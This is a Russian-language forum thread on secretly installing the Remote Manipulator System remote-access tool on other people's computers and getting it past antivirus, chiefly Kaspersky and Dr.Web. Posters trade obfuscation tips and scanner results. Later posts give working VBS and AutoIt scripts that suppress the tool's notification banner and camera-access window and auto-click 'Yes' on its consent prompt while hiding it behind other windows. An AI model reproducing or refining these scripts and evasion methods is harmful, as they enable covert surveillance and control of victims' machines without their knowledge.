RMS - полностью скрытая установка и управление.


Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
По моему и так очень неплохо.Это ты обычными комментариями так сбил детект?Я конечно не знаю vbs,но мне кажется ,что если объявить побольше переменных (это ведь несложно?),то можно ещё скинуть кого-нибудь.По крайней мере ,батник можно преобразить с помощью переменных до неузнаваемости (и главное,что это просто).Кстати,когда хочешь посмотреть более полную картину по детекту антивирей,регайся .Сервис платный,но один раз почекать можно нахаляву.60 антивирусных душ в наличии.
P.S.И на факаве открыли доступ к сканеру (мне он больше остальных почему то нравится).
 

Nedovirus

Уважаемый пользователь
Форумчанин
Регистрация
14.05.2014
Сообщения
399
Репутация
310
Magic_Mushroom, расширение загружаемого файла не забыл на bat поменять? в двух местах.
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
Magic_Mushroom, расширение загружаемого файла не забыл на bat поменять? в двух местах.
тоже самое, обходятся левые антивири километрами текста, а смена на .бат не принесла результата, касперский как ругался , так и ругается (а главная цель обойти именно его)
 

Nedovirus

Уважаемый пользователь
Форумчанин
Регистрация
14.05.2014
Сообщения
399
Репутация
310
у меня переставал ругаться. видно в понедельник придется мне переделпть скрипт против каспера и выложить сюда.

также не стоит забывать о разных уровнях эвристики у каспера на компе и у консоли на сервере мультискана, может вы и правильно по моей инструкции все делаете, просто настройки разные....
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
тоже самое, обходятся левые антивири километрами текста, а смена на .бат не принесла результата, касперский как ругался , так и ругается (а главная цель обойти именно его)
А ты не пробовал эту ?Палевность немного уменьшает.Тот твой скрипт (1.vbs) на факавском сканере 13 движками,после шифровки 7.А если конвертировать через неё твой уже обновлённый vbs скрипт?Хотя палева может и прибавиться)
1.gif
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
А ты не пробовал эту ?Палевность немного уменьшает.Тот твой скрипт (1.vbs) на факавском сканере 13 движками,после шифровки 7.А если конвертировать через неё твой уже обновлённый vbs скрипт?Хотя палева может и прибавиться)
к сожалению палева только прибавилосьbam88
до конвертирования тулзой:

после:
 
П

Принц Птица

Гость
УРЯЯЯЯ СБИЛ ДЕТЕКТ ДОХТОРА.................:utenok: :utenok: :utenok:

Попробуй сейчас и живая-ли она, на запуск не проверял:

Пароль:123

Эта делка не работает! Сегодня тестировал, из-за этой делки после установки вирус не запускается.
 

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
Приведу пример "Штучки" на vbs:

Код:
Set shell = WScript.CreateObject("WScript.Shell")
timeout = 5
title = "RMS_WND_HID"
Do
If shell.AppActivate(title) Then
Shell.SendKeys "%{F4}"

End If
WScript.Sleep 300
timeout = timeout - 1

Loop
Принц Птица, вот вбс скрипт на скрытие банера, забудь про эту длл :)
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 082
Репутация
8 199
А я выкладывал скрипт Аутоит здесь, который как-раз скрывает это окно и не только это, каспер кстати не детектит, там детектил доктор и помойму Нано и всё, да и-то я там в архиве выложил и обход доктора тоже...

Почему не используете тот скрипт, вполне рабочий я проверял ?i'm crazy
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 082
Репутация
8 199
Хочу сделать пару пояснений к своим видяшкам:

1)Там мелькает окно, как это убрать:
1.1)В тех скриптах был слип 300 миллесекунд, он не нужен, если его убрать, то окна будум практически незаметны...;
1.2)Можно делать уже открытые окна "Всегда поверх", кроме нашего окна с вопросом, тогда окно будет вообще невидно, вот поправил скрипт:
Код:
;Скрипт автоматически нажимает "Да"
#NoTrayIcon
While 1
    $hRMS = WinGetHandle("Remote Manipulator System - Вопрос") ;Получаем дискриптор окна с вопросом
    $hWnd = WinGetHandle("[ACTIVE]") ;Получаем текущее активное окно
    If $hWnd<>0 and ($hRMS="")  Then
        WinSetOnTop($hWnd, "", 1) ;Делаем текуущее активное окно поверх остальных (Кроме нашего окна с вопросом)
    EndIf
      If $hRMS<>"" Then
      ControlClick($hRMS, "", "[CLASS:Button;INSTANCE:1]") ;Если окно появилось, то быстренько нажимаем "Да" и выходим из цикла...
      ExitLoop ;Выходим из проги
    EndIf
WEnd

Далее прилагаю скрипт, который закроет окно камеры:
Код:
;Закрывает окно камеры !
#NoTrayIcon
While 1 ;Наш цикл, который ожидает появления окна камеры
$hRMS2 = WinGetHandle("RMS_WND_HID") ;Получаем дискриптор окна
If $hRMS2<>"" Then
      WinClose($hRMS2) ;Закрываем окно...
    EndIf
WEnd ;И так в цикле...

З.Ы. Из-за головотяпства и спешки забыл указать ссылки на форум в видяшках, а люди спрашивают, пойду исправляться...Отдыхай!!!
 
Верх Низ